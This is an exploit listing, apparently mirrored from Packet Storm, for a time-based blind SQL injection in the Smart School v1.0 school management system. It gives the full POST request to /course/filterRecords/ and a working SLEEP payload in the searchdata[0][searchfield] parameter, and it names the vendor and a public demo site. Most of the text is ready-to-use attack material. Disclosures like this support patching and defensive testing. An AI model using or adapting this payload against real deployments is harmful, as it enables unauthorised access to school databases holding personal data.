Share
## https://sploitus.com/exploit?id=PACKETSTORM:172537
# Exploit Title: Smart School v1.0 - SQL Injection  
# Date: 2023-05-17  
# Exploit Author: Ahmet รœmit BAYRAM  
# Vendor: https://codecanyon.net/item/smart-school-school-management-system/19426018  
# Demo Site: https://demo.smart-school.in  
# Tested on: Kali Linux  
# CVE: N/A  
  
  
### Request ###  
  
POST /course/filterRecords/ HTTP/1.1  
Host: localhost  
Cookie: ci_session=dd1bqn8ulsiog4vf7fle5hd4k4fklvve  
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101  
Firefox/102.0  
Accept: */*  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
X-Requested-With: XMLHttpRequest  
Content-Length: 136  
Origin: https://localhost  
Referer: https://localhost/course/  
Sec-Fetch-Dest: empty  
Sec-Fetch-Mode: cors  
Sec-Fetch-Site: same-origin  
Te: trailers  
Connection: close  
  
searchdata%5B0%5D%5Btitle%5D=category&searchdata%5B0%5D%5Bsearchfield%5D=online_courses.category_id&searchdata%5B0%5D%5Bsearchvalue%5D=1  
  
  
### Parameter & Payloads ###  
  
Parameter: searchdata[0][searchfield] (POST)  
Type: time-based blind  
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)  
Payload:  
searchdata[0][title]=category&searchdata[0][searchfield]=online_courses.category_id  
AND (SELECT 7313 FROM (SELECT(SLEEP(5)))mvaR)--  
hAHp&searchdata[0][searchvalue]=1